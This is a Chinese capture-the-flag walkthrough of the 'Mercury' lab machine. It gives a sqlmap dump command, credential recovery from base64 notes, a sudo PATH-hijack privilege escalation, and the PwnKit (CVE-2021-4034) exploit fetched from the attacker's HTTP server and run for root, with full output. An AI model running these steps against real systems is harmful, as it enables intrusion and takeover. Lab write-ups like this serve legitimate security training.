mercury靶机

2024-01-11 01:44
文章标签 靶机 mercury

本文主要是介绍mercury靶机,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!


文章妙语

不与伪君子争名,不与真小人争利,不与执拗人争理,不与匹夫争勇,不与酸儒争才。不与蠢人施恩



一、信息收集

主机探测

端口探测

探测主机详细版本信息

8080开了http服务

目录扫描

 robots.txt目录下什么也没有

 

 二,漏洞发现

顺便输入一个错误的参数,报错出重要目录:mercuryfacts/

 

 

 像是sql漏洞,sqlmap跑一下,果然有sql漏洞,这里就不演示了,因为没有过滤,直接一把梭

python sqlmap.py -u "http://192.168.1.41:8080/mercuryfacts/1" --batch -D mercury -T users -C username,password --dump

 

三,ssh连接

webmaster:mercuryisthesizeof0.056Earths

 

 五,提权

1.第一种

webmaster@mercury:/home$ ll
total 20
drwxr-xr-x  5 root        root        4096 Aug 28  2020 ./
drwxr-xr-x 19 root        root        4096 Sep  1  2020 ../
drwx------  3 linuxmaster linuxmaster 4096 Jan 10 12:46 linuxmaster/
drwx------  3 mercury     mercury     4096 Sep  1  2020 mercury/
drwx------  4 webmaster   webmaster   4096 Sep  2  2020 webmaster/
webmaster@mercury:/home$ cd /web
-bash: cd: /web: No such file or directory
webmaster@mercury:/home$ cd webmaster/
webmaster@mercury:~$ ll
total 36
drwx------ 4 webmaster webmaster 4096 Sep  2  2020 ./
drwxr-xr-x 5 root      root      4096 Aug 28  2020 ../
lrwxrwxrwx 1 webmaster webmaster    9 Sep  1  2020 .bash_history -> /dev/null
-rw-r--r-- 1 webmaster webmaster  220 Aug 27  2020 .bash_logout
-rw-r--r-- 1 webmaster webmaster 3771 Aug 27  2020 .bashrc
drwx------ 2 webmaster webmaster 4096 Aug 27  2020 .cache/
drwxrwxr-x 5 webmaster webmaster 4096 Aug 28  2020 mercury_proj/
-rw-r--r-- 1 webmaster webmaster  807 Aug 27  2020 .profile
-rw-rw-r-- 1 webmaster webmaster   75 Sep  1  2020 .selected_editor
-rw------- 1 webmaster webmaster   45 Sep  1  2020 user_flag.txt
webmaster@mercury:~$ cat user_flag.txt
[user_flag_8339915c9a454657bd60ee58776f4ccd]
webmaster@mercury:~$ cd mercury_proj/
webmaster@mercury:~/mercury_proj$ ll
total 28
drwxrwxr-x 5 webmaster webmaster 4096 Aug 28  2020 ./
drwx------ 4 webmaster webmaster 4096 Sep  2  2020 ../
-rw-r--r-- 1 webmaster webmaster    0 Aug 27  2020 db.sqlite3
-rwxr-xr-x 1 webmaster webmaster  668 Aug 27  2020 manage.py*
drwxrwxr-x 6 webmaster webmaster 4096 Sep  1  2020 mercury_facts/
drwxrwxr-x 4 webmaster webmaster 4096 Aug 28  2020 mercury_index/
drwxrwxr-x 3 webmaster webmaster 4096 Aug 28  2020 mercury_proj/
-rw------- 1 webmaster webmaster  196 Aug 28  2020 notes.txt
webmaster@mercury:~/mercury_proj$ cat notes.txt
Project accounts (both restricted):
webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK
linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==

 在notes.txt中发现了,linuxmaster的密码,要经过base64解密

webmaster@mercury:~/mercury_proj$ echo 'bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==' | base64 -d
mercurymeandiameteris4880km

su 到linuxmaster中

linuxmaster@mercury:/tmp$ sudo -l
[sudo] password for linuxmaster:
Matching Defaults entries for linuxmaster on mercury:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser linuxmaster may run the following commands on mercury:(root : root) SETENV: /usr/bin/check_syslog.sh
linuxmaster@mercury:/tmp$ cat /usr/bin/check_syslog.sh
#!/bin/bash
tail -n 10 /var/log/syslog

linuxmaster@mercury:/tmp$ echo '/bin/bash' > shell   将/bin/bash写到shell中linuxmaster@mercury:/tmp$ export PATH=.:$PATH        将当前目录放到PATH环境中linuxmaster@mercury:/tmp$ chmod 777 shell            加可执行权限linuxmaster@mercury:/tmp$ sudo --preserve-env=PATH /usr/bin/check_syslog.sh    
当你使用 sudo 执行命令时,通常会创建一个新的、较为干净的环境,以防止潜在的安全问题。--preserve-env 允许你指定要在新环境中保留的环境变量,其中 PATH 是一个常见的环境变量root@mercury:/tmp# id
uid=0(root) gid=0(root) groups=0(root)root@mercury:/tmp# cd /rootroot@mercury:~# cat root_flag.txt
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@/##@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@(((/(*(/((((((&@@@@@@@@@@@@@
@@@@@@@@@@@((#(#(###((##//(((/(/(((*((//@@@@@@@@@@
@@@@@@@@/#(((#((((((/(/,*/(((///(/*/*/#@@@@@@@
@@@@@@*((####((///*//(///*(/*//((/(((//**/((&@@@@@
@@@@@/(/(((##/*((//(#((((((/(///(((((///(*@@@@
@@@@/(//((((#(((((*///*/(/(/(((/(((/*/*(///@@@
@@@//**/(/(#(#(##((/(((((/(**//((//((*/#@@
@@@(//(/((((((#((((#*/((///((///((//(/(/(*(/@@
@@@((//((((/((((#(/(/((/(/(((((#((((((/(/((/@@
@@@(((/(((/##((#((/*///((/((/((##((/(/(/((((((/*@@
@@@(((/(##/#(((##((/((((((/(##(/##(#((/((((#((*%@@
@@@@(///(#(((((#(#(((((#(//((#((###((/(((((/(//@@@
@@@@@(/*/(##(/(###(((#((((/((####/((((///((((/@@@@
@@@@@@%//((((#############((((/((/(/(*/(((((@@@@@@
@@@@@@@@%#(((############(##((#((*//(/(*//@@@@@@@@
@@@@@@@@@@@/(#(####(###/((((((#(///((//(@@@@@@@@@@
@@@@@@@@@@@@@@@(((###((#(#(((/((///*@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@%#(#%@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Congratulations on completing Mercury!!!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_69426d9fda579afbffd9c2d47ca31d90]

2.第二种(内核提权)

通过在kali中下载CVE-2021-4034提权

wget https://github.com/berdav/CVE-2021-4034.git
┌──(root㉿kali)-[~/kali/CVE]
└─# ll
总计 64
drwxr-xr-x 5 root root  4096  1月 4日 02:14 CVE-2021-4034
-rw-r--r-- 1 root root 57922  1月 4日 04:25 CVE-2021-4034.tar.gz┌──(root㉿kali)-[~/kali/CVE]
└─# python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...

 1.mkdir123

2.cd 123

3.wget http://192.168.1.48:8888/CVE-2021-4034.tar.gz

4.tar -xvf CVE-2021-4034.tar.gz                                                 # 一定要先在kali中压缩,然后再靶机上下载,不然会有问题

5.cd CVE-2021-4034/

6.make

7../cve-2021-4034

下面的不用看,按上述步骤来

linuxmaster@mercury:/tmp/CVE-2021-4034$ mkdir 123
linuxmaster@mercury:/tmp/CVE-2021-4034$ cd 123/
linuxmaster@mercury:/tmp/CVE-2021-4034/123$ wget http://192.168.1.48:8888/CVE-2021-4034.tar.gz
--2024-01-10 14:11:40--  http://192.168.1.48:8888/CVE-2021-4034.tar.gz
Connecting to 192.168.1.48:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 57922 (57K) [application/gzip]
Saving to: ‘CVE-2021-4034.tar.gz’

CVE-2021-4034.tar.gz                                           100%[==================================================================================================================================================>]  56.56K  --.-KB/s    in 0.001s

2024-01-10 14:11:40 (92.1 MB/s) - ‘CVE-2021-4034.tar.gz’ saved [57922/57922]

linuxmaster@mercury:/tmp/CVE-2021-4034/123$ tar -xvf CVE-2021-4034.tar.gz

linuxmaster@mercury:/tmp/CVE-2021-4034/123$ ll
total 72
drwxrwxr-x 3 linuxmaster linuxmaster  4096 Jan 10 14:11 ./
drwxr-xr-x 3 linuxmaster linuxmaster  4096 Jan 10 14:11 ../
drwxr-xr-x 5 linuxmaster linuxmaster  4096 Jan  4 07:14 CVE-2021-4034/
-rw-rw-r-- 1 linuxmaster linuxmaster 57922 Jan  4 09:25 CVE-2021-4034.tar.gz
linuxmaster@mercury:/tmp/CVE-2021-4034/123$ cd CVE-2021-4034/
linuxmaster@mercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ ll
total 68
drwxr-xr-x 5 linuxmaster linuxmaster  4096 Jan  4 07:14  ./
drwxrwxr-x 3 linuxmaster linuxmaster  4096 Jan 10 14:11  ../
-rw-r--r-- 1 linuxmaster linuxmaster   292 Jan  4 07:05  cve-2021-4034.c
-rwxr-xr-x 1 linuxmaster linuxmaster   305 Jan  4 07:05  cve-2021-4034.sh*
drwxr-xr-x 2 linuxmaster linuxmaster  4096 Jan  4 07:05  dry-run/
-rw-r--r-- 1 linuxmaster linuxmaster    33 Jan  4 07:06  gconv-modules
drwxr-xr-x 2 linuxmaster linuxmaster  4096 Jan  4 07:06 'GCONV_PATH=.'/
drwxr-xr-x 8 linuxmaster linuxmaster  4096 Jan  4 07:05  .git/
-rw-r--r-- 1 linuxmaster linuxmaster   114 Jan  4 07:05  .gitignore
-rw-r--r-- 1 linuxmaster linuxmaster  1071 Jan  4 07:05  LICENSE
-rw-r--r-- 1 linuxmaster linuxmaster   469 Jan  4 07:05  Makefile
-rw-r--r-- 1 linuxmaster linuxmaster   339 Jan  4 07:05  pwnkit.c
-rwxr-xr-x 1 linuxmaster linuxmaster 15560 Jan  4 07:06  pwnkit.so*
-rw-r--r-- 1 linuxmaster linuxmaster  3419 Jan  4 07:05  README.md
linuxmaster@mercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ make
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
linuxmaster@mercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ ll
total 88
drwxr-xr-x 5 linuxmaster linuxmaster  4096 Jan 10 14:12  ./
drwxrwxr-x 3 linuxmaster linuxmaster  4096 Jan 10 14:11  ../
-rwxrwxr-x 1 linuxmaster linuxmaster 16752 Jan 10 14:12  cve-2021-4034*
-rw-r--r-- 1 linuxmaster linuxmaster   292 Jan  4 07:05  cve-2021-4034.c
-rwxr-xr-x 1 linuxmaster linuxmaster   305 Jan  4 07:05  cve-2021-4034.sh*
drwxr-xr-x 2 linuxmaster linuxmaster  4096 Jan  4 07:05  dry-run/
-rw-r--r-- 1 linuxmaster linuxmaster    33 Jan  4 07:06  gconv-modules
drwxr-xr-x 2 linuxmaster linuxmaster  4096 Jan  4 07:06 'GCONV_PATH=.'/
drwxr-xr-x 8 linuxmaster linuxmaster  4096 Jan  4 07:05  .git/
-rw-r--r-- 1 linuxmaster linuxmaster   114 Jan  4 07:05  .gitignore
-rw-r--r-- 1 linuxmaster linuxmaster  1071 Jan  4 07:05  LICENSE
-rw-r--r-- 1 linuxmaster linuxmaster   469 Jan  4 07:05  Makefile
-rw-r--r-- 1 linuxmaster linuxmaster   339 Jan  4 07:05  pwnkit.c
-rwxr-xr-x 1 linuxmaster linuxmaster 15560 Jan  4 07:06  pwnkit.so*
-rw-r--r-- 1 linuxmaster linuxmaster  3419 Jan  4 07:05  README.md
linuxmaster@mercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ chmod +x cve-2021-4034
linuxmaster@mercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ ls
 cve-2021-4034   cve-2021-4034.c   cve-2021-4034.sh   dry-run   gconv-modules  'GCONV_PATH=.'   LICENSE   Makefile   pwnkit.c   pwnkit.so   README.md
linuxmaster@mercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ ll
total 88
drwxr-xr-x 5 linuxmaster linuxmaster  4096 Jan 10 14:12  ./
drwxrwxr-x 3 linuxmaster linuxmaster  4096 Jan 10 14:11  ../
-rwxrwxr-x 1 linuxmaster linuxmaster 16752 Jan 10 14:12  cve-2021-4034*
-rw-r--r-- 1 linuxmaster linuxmaster   292 Jan  4 07:05  cve-2021-4034.c
-rwxr-xr-x 1 linuxmaster linuxmaster   305 Jan  4 07:05  cve-2021-4034.sh*
drwxr-xr-x 2 linuxmaster linuxmaster  4096 Jan  4 07:05  dry-run/
-rw-r--r-- 1 linuxmaster linuxmaster    33 Jan  4 07:06  gconv-modules
drwxr-xr-x 2 linuxmaster linuxmaster  4096 Jan  4 07:06 'GCONV_PATH=.'/
drwxr-xr-x 8 linuxmaster linuxmaster  4096 Jan  4 07:05  .git/
-rw-r--r-- 1 linuxmaster linuxmaster   114 Jan  4 07:05  .gitignore
-rw-r--r-- 1 linuxmaster linuxmaster  1071 Jan  4 07:05  LICENSE
-rw-r--r-- 1 linuxmaster linuxmaster   469 Jan  4 07:05  Makefile
-rw-r--r-- 1 linuxmaster linuxmaster   339 Jan  4 07:05  pwnkit.c
-rwxr-xr-x 1 linuxmaster linuxmaster 15560 Jan  4 07:06  pwnkit.so*
-rw-r--r-- 1 linuxmaster linuxmaster  3419 Jan  4 07:05  README.md
linuxmaster@mercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ ./cve-2021-4034
# id
uid=0(root) gid=0(root) groups=0(root),1002(linuxmaster),1003(viewsyslog)
# cd root
/bin/sh: 2: cd: can't cd to root
# cd /root
# ll
/bin/sh: 4: ll: not found
# ls
root_flag.txt
#  at roo
# cat root_flag.txt
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@/##@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@(((/(*(/((((((&@@@@@@@@@@@@@
@@@@@@@@@@@((#(#(###((##//(((/(/(((*((//@@@@@@@@@@
@@@@@@@@/#(((#((((((/(/,*/(((///(/*/*/#@@@@@@@
@@@@@@*((####((///*//(///*(/*//((/(((//**/((&@@@@@
@@@@@/(/(((##/*((//(#((((((/(///(((((///(*@@@@
@@@@/(//((((#(((((*///*/(/(/(((/(((/*/*(///@@@
@@@//**/(/(#(#(##((/(((((/(**//((//((*/#@@
@@@(//(/((((((#((((#*/((///((///((//(/(/(*(/@@
@@@((//((((/((((#(/(/((/(/(((((#((((((/(/((/@@
@@@(((/(((/##((#((/*///((/((/((##((/(/(/((((((/*@@
@@@(((/(##/#(((##((/((((((/(##(/##(#((/((((#((*%@@
@@@@(///(#(((((#(#(((((#(//((#((###((/(((((/(//@@@
@@@@@(/*/(##(/(###(((#((((/((####/((((///((((/@@@@
@@@@@@%//((((#############((((/((/(/(*/(((((@@@@@@
@@@@@@@@%#(((############(##((#((*//(/(*//@@@@@@@@
@@@@@@@@@@@/(#(####(###/((((((#(///((//(@@@@@@@@@@
@@@@@@@@@@@@@@@(((###((#(#(((/((///*@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@%#(#%@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Congratulations on completing Mercury!!!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_69426d9fda579afbffd9c2d47ca31d90]

这篇关于mercury靶机的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/592749

相关文章

tomato靶机通关攻略

主机发现  用kali去扫描端口,发现有3个开放端口 访问网站    在kali里面进行目录扫描,找到一个antibot_image   找到一个/antibot_image/ 目录,进而找到/antibots/目录  发现可能存在文件包含    页面通过image传参查看passwd文件  页面通过image传参查看日志文件   将一句话木马作为ssh登录的用户

.hackme靶机通关攻略

第一步查找ip 通过御剑扫描到IP进入尝试 成功找到靶场 步骤二来到这个靶场注册登录 进来点一下提交出来书名 只有一个框框那就来试试sql注入 1’ and 1=2 --+ 然后查看数据库 -1' union select database(),2,3 # 查看数据库表名 -1' union select group_concat(table_name),2,3

hackme靶机通关攻略

1、登录靶机,查询是否有注入点 2、判断闭合方式 输入OSINT' and 1=1 # 输入OSINT' and 1=2 # 得出闭合方式为单引号 2、查询数据库名 输入-1' union select database(),2,3 # 3、查询数据库中的表 输入-1' union select group_concat(table_name),2,3 from informa

自搭靶机实现SSH爆破复现记录

编写脚本实现ssh爆破。可使用paramiko、pexpect、pxssh等Python模块进行编写。但在ssh服务端将配置加密方式为非常用加密方式3des-cbc,端口为9981端口。 创建 了一个新的Kali虚拟机作为靶机,使用原本的Kali作为攻击机。 设置一个用户为target1234,用户密码为targetpasswd123。 root用户为kaliTarget: 登录进去后

sickos 靶机渗透(wolf cms 渗透,squid 代理)

靶机信息 vulnhub靶机 主机发现 192.168.50.152 为靶机Ip ┌──(kali㉿kali)-[~/testSickos]└─$ sudo nmap -sn 192.168.50.0/24[sudo] password for kali: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 09:56 C

vulhub xxe靶机通关教程

首先我们进行端口扫描 扫出来端口之后去尝试得出地址为183 发现robots.txt文件 由此我们就得到了两个目录 我们先进入xxe目录,并开始登录抓包 并进入重放器在xml里面构造语句 <!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY admin SYSTEM "php://filter/read=convert.base64-en

vulhub xxe靶机攻击教程

使用御剑目录扫描工具测试一下,发现有robots.txt文件 访问robots.txt文件,这个文件通常放的是一个网站的目录 我们得到两个目录,试着访问一下 xxe目录下是一个登录页面,xxe/admin.php目录下也是一个登录页面 我们先在xxe页面进行登录抓包测试 得到的数据包发到重放器中进行xxe注入测试,更改用户名为2,则响应包中回显2 所以存在用户名处有

vulhub xxe靶机

步骤一,访问浏览器 步骤二,输入/robots.txt 步骤三,发现存在用户登录的一个界面/xxe 我们登录进去 步骤四,随便输入一个数字或者字母打开BP 抓到包之后发送的重放器里边 通过抓包发现是XML数据提交 步骤五,通过php://filter读取admin.php的文件源码 <?xml version="1.0" encoding="UTF-8"?> <!DOC

网络安全之DC-1靶机渗透实验

一、下载DC-1靶机虚拟机镜像文件,导入VM虚拟机 https://pan.baidu.com/s/1B1IbAgA8vD9-cZ_mdZy9wA?pwd=qwui 二、设置DC-1的网卡模式为NAT模式,记录其MAC地址 三、在kali系统中利用nmap工具扫描本网段主机信息 # nmap -sP 192.168.2.0/24 -oN nmap.sP 由图可知靶机获取到的地址是1

网络安全之渗透测试实战-DC-3-靶机入侵

一、下载靶机DC-3,解压后导入Vmware Workstation https://pan.baidu.com/s/17BcSH6RqC7wuyB7PRNqOow?pwd=kc12 启动DC-3靶机,由于不知道密码,无需登录 二、靶机的网卡采用的是NAT模式自动获取IP地址,此时我们需要先获取其MAC地址。 三、因为DC-3与kali攻击机在同一个网段,在kali攻击机中利用nmap